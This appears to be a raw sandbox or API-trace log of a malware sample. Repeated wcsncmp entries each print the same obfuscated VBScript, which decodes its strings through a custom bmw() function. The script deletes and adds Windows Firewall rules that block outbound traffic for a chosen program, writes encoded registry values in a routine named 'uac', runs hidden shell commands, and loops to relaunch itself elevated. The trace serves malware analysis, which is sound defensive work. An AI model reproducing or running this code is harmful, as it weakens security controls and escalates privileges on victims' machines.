bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.974] wcsncmp (_String1="n\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.974] wcsncmp (_String1="\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0222.974] wcsncmp (_String1="\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.974] wcsncmp (_String1="\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0222.974] wcsncmp (_String1="\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, 